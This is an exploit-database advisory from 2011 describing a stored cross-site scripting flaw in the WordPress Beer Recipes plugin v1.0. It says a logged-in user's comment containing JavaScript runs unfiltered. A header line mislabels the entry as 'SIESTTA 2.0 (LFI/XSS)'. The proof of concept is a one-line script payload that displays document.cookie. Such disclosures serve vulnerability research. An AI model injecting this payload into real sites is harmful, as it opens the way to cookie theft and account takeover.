id: 16413
date: 06/25/2011
title: Wordpress Beer Recipes Plugin v.1.0 XSS Vulnerability
author: TheUzuki
cves: 

# Exploit Title: Wordpress - Beer Recipes v.1.0 XSS
# Google Dork: -
# Author: TheUzuki
# Software Link: http://opensourcebrew.org/beer-recipes-plugin/
# Version: v.1.0
# Tested on: Windows 7
# CVE : -
 
####################################################################
# SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities
# download: http://opensourcebrew.org/beer-recipes-plugin/
#
# Author: TheUzuki.' from HF
# mail: uzuki[@]live[dot]de
#
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
####################################################################
#
# Notes: You need to be User at the Wordpress Board
#
####################################################################
 
--Description of Wordpress Plugin--
 
Creates a custom post type for easily entering beer recipes into WordPress
 
--Exploit--
 
By Commenting a Beer Recip, with a javascript, the Javascripts,gets executed directly.
This causes a XSS.
 
--PoC--
 
<script>alert(document.cookie)</script>



#  0day.today [2023-03-22]  #